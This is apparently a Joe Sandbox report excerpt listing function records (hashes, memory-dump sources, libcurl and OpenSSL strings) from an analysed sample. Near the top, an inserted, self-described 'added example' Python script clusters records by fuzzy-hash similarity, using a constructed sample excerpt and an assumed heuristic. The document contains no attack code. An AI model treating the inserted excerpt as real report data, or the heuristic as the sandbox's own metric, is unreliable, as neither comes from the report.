                                                            • Opcode Fuzzy Hash: f66b9388b79e1c5be0564116b794aa1948afb4f18a0350bfbca677ecab764c4c
                                                            • Instruction Fuzzy Hash: 4FB21772A08301EBD7209A24DC4AB6BB7D5AF54704F08463CF989972D3EB79EC42D752
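The records above are the per-function entries the Joe Sandbox IDA plugin emits: each carries an Opcode ID, an Instruction ID and two fuzzy hashes, the functions dumped from the 0x7400000 region have Instruction Fuzzy Hash values that differ in only a handful of nibbles, and the 0x6C0000 function carries strings matching libcurl's cookie.c. The following added example (not part of the Joe Sandbox report or its plugin) parses this flattened record format and groups functions whose Instruction Fuzzy Hash values are close, which is how an analyst would spot the near-duplicate stubs in the 0x7400000 dump at a glance. The positional nibble-match score it uses is an assumed heuristic for illustration, not the metric behind the report's own "Similarity" section, and the embedded excerpt is a constructed, abridged subset of the records shown on this page.

```python
"""Cluster Joe Sandbox function records by Instruction Fuzzy Hash similarity.

Added example, not part of the Joe Sandbox report or its IDA plugin. The score
is a positional nibble-match ratio, an assumed heuristic for illustration and
not the metric behind the report's own "Similarity" section.
"""
import re
from itertools import combinations

# Constructed, abridged excerpt of five records from the report page: three
# functions from the 0x7400000 dump, one from 0x74A0000, and the 0x6C0000
# function whose strings match libcurl's cookie.c (string list shortened).
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
• String ID:
• Opcode ID: fde468dd6778241a931a3ca072cdcb13b4f5a462fb7dca5a5566f6278d82eab9
• Instruction ID: bb16d3b24d6e02e7d6e36fd4130f208dca0a5372721d0529f449c94ff551978d
• Instruction Fuzzy Hash: 7831BFEB02C114BDA25595411B54BFA676EE6D7230F308C37F807D55A2E3B88A4B11B1
Memory Dump Source
• Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
• String ID:
• Opcode ID: c0f697e570dc7929080a61868b3b40b17e0ac2f1edfe65ad9bdedd43cd11deab
• Instruction ID: 72694a7b46e60cafa0269968e2e93f75d539aa2eb3ac9e327bc64a71b597013b
• Instruction Fuzzy Hash: 3531F3EB01D118BCB21595811B54BFA6B6EE6C7330F318C37F807E55A2E2B84B4B51B1
Memory Dump Source
• Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
• String ID:
• Opcode ID: e22823a2af0fa860aa2178166067df75531e2eb5484b68720511d8366c224156
• Instruction ID: a8791db8c0ae99aeb5276f56c87a25fa439891c5ce8504592c9550504737df97
• Instruction Fuzzy Hash: CC31F4EB01D154BCB20695511B10BFA6B6EEAC3230B308C37F807D51A2D2B85B4B52F1
Memory Dump Source
• Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
• String ID:
• Opcode ID: f70b939b1e36f3279fbaa919798360f7776236772f96d73433155342797b6d39
• Instruction ID: 6ed6283dd3874bb67ddc212dcfa4513e1d555608293f062714ba22aa4bfe3662
• Instruction Fuzzy Hash: 58D0C2A101C68AFFCF4226B849A22E99F540A2B304F011A17A942BB0F7B19110824082
Strings
Memory Dump Source
• Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
• Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
• String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$__Host-$__Secure-$cookie.c$domain$expires$httponly$max-age$path$secure
• Opcode ID: f66b9388b79e1c5be0564116b794aa1948afb4f18a0350bfbca677ecab764c4c
• Instruction ID: f93889f9e79df5e30892b71fdeed698d5e48cc52561d775e8c8e25aae5971806
• Instruction Fuzzy Hash: 4FB21772A08301EBD7209A24DC4AB6BB7D5AF54704F08463CF989972D3EB79EC42D752
"""

FIELDS = {"Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
          "Instruction Fuzzy Hash": "instr_fuzzy"}


def parse_records(text):
    """Split the flattened report text into one dict per function record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":          # every record starts here
            cur = {"offset": None, "strings": [], "instr_fuzzy": ""}
            records.append(cur)
        elif cur is not None and line.startswith("•"):
            key, _, value = line.lstrip("• ").partition(":")
            key, value = key.strip(), value.strip()
            if key == "Source File":               # dump base from "Offset: ..."
                m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", value)
                cur["offset"] = int(m.group(1), 16) if m else None
            elif key == "String ID":               # strings are '$'-separated
                cur["strings"] = [s for s in value.split("$") if s]
            elif key in FIELDS:
                cur[FIELDS[key]] = value
    return records


def hash_similarity(h1, h2):
    """Fraction of hex positions that agree (assumed heuristic, see docstring)."""
    if not h1 or not h2:
        return 0.0
    matches = sum(1 for a, b in zip(h1.upper(), h2.upper()) if a == b)
    return matches / max(len(h1), len(h2))


def cluster_by_similarity(records, threshold=0.6):
    """Union-find over record pairs whose hashes score >= threshold.
    Returns lists of Instruction IDs, largest cluster first."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]       # path halving
            i = parent[i]
        return i

    for i, j in combinations(range(len(records)), 2):
        if hash_similarity(records[i]["instr_fuzzy"], records[j]["instr_fuzzy"]) >= threshold:
            parent[find(i)] = find(j)
    groups = {}
    for i, rec in enumerate(records):
        groups.setdefault(find(i), []).append(rec.get("instruction_id", "?"))
    return sorted(groups.values(), key=lambda g: (-len(g), g[0]))
```

Running `cluster_by_similarity(parse_records(SAMPLE_REPORT))` puts the three 0x7400000 functions in one group and leaves the 0x74A0000 and cookie.c functions as singletons; the 0.6 threshold is a starting point to tune against a larger report, since the score treats every hex position equally and says nothing about which instruction bytes differ.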
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                            • API String ID: 0-122532811
                                                            • Opcode ID: 58d7d54c85dd8fe70ad28a9372837657fcf402d2c152ca615bda222aab2c5726
                                                            • Instruction ID: dd43ebfd3f4c78830712fd7e17a90c01ef25710a96ab0c75c006e0b3638e958b
                                                            • Opcode Fuzzy Hash: 58d7d54c85dd8fe70ad28a9372837657fcf402d2c152ca615bda222aab2c5726
                                                            • Instruction Fuzzy Hash: F042E6B1B08700AFD708DE28CC41BABB6EAEBC4704F04892DF55E97391D775AD148B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                            • API String ID: 0-3977460686
                                                            • Opcode ID: 69b58a754b93cc6708c42cf36e6f3a74d46482ddbc81f632722d08a1250515e0
                                                            • Instruction ID: d55b110d7fc113af15ab5dfaeda906f7bdacd170a2071bf14c2dc1ae0bc3843a
                                                            • Opcode Fuzzy Hash: 69b58a754b93cc6708c42cf36e6f3a74d46482ddbc81f632722d08a1250515e0
                                                            • Instruction Fuzzy Hash: 053237B1E083014BC7249F299C4136AB7D7AF95320F15472FE9A69B3D2EB34DD458B82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -vc$ate$attempts$ndot$retr$retr$rota$time$use-$usev
                                                            • API String ID: 0-645557312
                                                            • Opcode ID: 22258b3b8dab92458032d78d25c8e4946d598386dfe0f291217b268edbb8f509
                                                            • Instruction ID: e2bafe8a0cf64b830f19917d4a205889209f3e2a05e55d30a4b88a88e3dead13
                                                            • Opcode Fuzzy Hash: 22258b3b8dab92458032d78d25c8e4946d598386dfe0f291217b268edbb8f509
                                                            • Instruction Fuzzy Hash: 0961FCE5A08300A7EF14A620AC46B3B76999B95384F04C83DFD4E96392FA79E904C353
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                            • API String ID: 0-1914377741
                                                            • Opcode ID: 4691d7052ef09fca112245a88fe72007340b7968c66435a20b3ebdf10ee703a3
                                                            • Instruction ID: e04c1aa1cd343c00c7d2bf5656554af75db4ba4818092144fefdd78450a39b7d
                                                            • Opcode Fuzzy Hash: 4691d7052ef09fca112245a88fe72007340b7968c66435a20b3ebdf10ee703a3
                                                            • Instruction Fuzzy Hash: C4724B30A0ABC19FE7218A29C5467E677D3AF91348F08862CED865B393E776DC85C741
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                            • API String ID: 0-3476178709
                                                            • Opcode ID: 03477edbe49ded09fc4b30dc7cea726a7cd190e74ec86d0b16d0083d5288eb06
                                                            • Instruction ID: c8737b3297bdbd9eec18792eb8018cb2adec72e080cb879b768e9f99072b91af
                                                            • Opcode Fuzzy Hash: 03477edbe49ded09fc4b30dc7cea726a7cd190e74ec86d0b16d0083d5288eb06
                                                            • Instruction Fuzzy Hash: 6631D2A2F14A4526F7681009DC46F7E415BC3C4B10E6A823FFA0BDBBC2D8F59D4142A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                            • API String ID: 0-2550110336
                                                            • Opcode ID: c7995b6f5ba0b7d0f8f4b12e17579c18fab8c8ef9a093a5b2aa1add57ffe63ba
                                                            • Instruction ID: e5770086b4ea786c88423bba913d7f9eca4382ca878bdfbdf0b8fea4d403c477
                                                            • Opcode Fuzzy Hash: c7995b6f5ba0b7d0f8f4b12e17579c18fab8c8ef9a093a5b2aa1add57ffe63ba
                                                            • Instruction Fuzzy Hash: 3A325930748344ABEB24BA649C4AF6A7799FF50B04F148428F989DA2C3EF74D945C753
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.$;$?$?$xn--$xn--
                                                            • API String ID: 0-543057197
                                                            • Opcode ID: ff7a63a8ccffdf53295f452f19fbb53ece5168ec50dbab1fcd614027261e2228
                                                            • Instruction ID: 8dbb77b9422f5b42059f16f6c9f492073d6ca686677d0085dc4756d643f4c406
                                                            • Opcode Fuzzy Hash: ff7a63a8ccffdf53295f452f19fbb53ece5168ec50dbab1fcd614027261e2228
                                                            • Instruction Fuzzy Hash: A122F5B2A44301AFEB20BB24EC45B6B76E5AF95348F04453CF85997292F739ED04C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1569152203.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, Offset: 01AA6000, based on PE: false
                                                            • Associated: 00000000.00000003.1566635388.0000000001AA6000.00000004.00000020.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_1aa6000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: wH<F
                                                            • API String ID: 0-1164510747
                                                            • Opcode ID: 75d3eec58da587806d0b0948babdebf6639f905a54bf9b74a4eb42f0e38ba0e6
                                                            • Instruction ID: 18b5036feea049c5269c66e53a37a665a7ea58d10a00a49a25f5a53be5179f76
                                                            • Opcode Fuzzy Hash: 75d3eec58da587806d0b0948babdebf6639f905a54bf9b74a4eb42f0e38ba0e6
                                                            • Instruction Fuzzy Hash: 08F213A281E7C15FD7038BB488B95907FB4AE5712074E86DFC4C5CF8B3E259585AC722
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 0-2555271450
                                                            • Opcode ID: 66b387c55c9664fb5d78621915c350d174b5a726a16fffca5bf701fadb43a66a
                                                            • Instruction ID: 0e6640e737d8b2aa5488d689b6afe1ce49cb6c37168377f1351514be3bad347c
                                                            • Opcode Fuzzy Hash: 66b387c55c9664fb5d78621915c350d174b5a726a16fffca5bf701fadb43a66a
                                                            • Instruction Fuzzy Hash: CDC29E71A083458FC714CF28C491B6AB7E2FFD9314F19992DE89A9B351D730ED468B82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 0-2555271450
                                                            • Opcode ID: e4049b90c83ea740dd018df54762b32f2b17141696489a816c7000806b8c7141
                                                            • Instruction ID: 2edea84a13a3f5add983b81be2719abf806d2a1659ab7578d1b41986a00aef06
                                                            • Opcode Fuzzy Hash: e4049b90c83ea740dd018df54762b32f2b17141696489a816c7000806b8c7141
                                                            • Instruction Fuzzy Hash: DC827D75A083419FD714CF28C880B6AB7E2EFC5724F188A2DF9A997391D735DC058B92
                                                            Strings
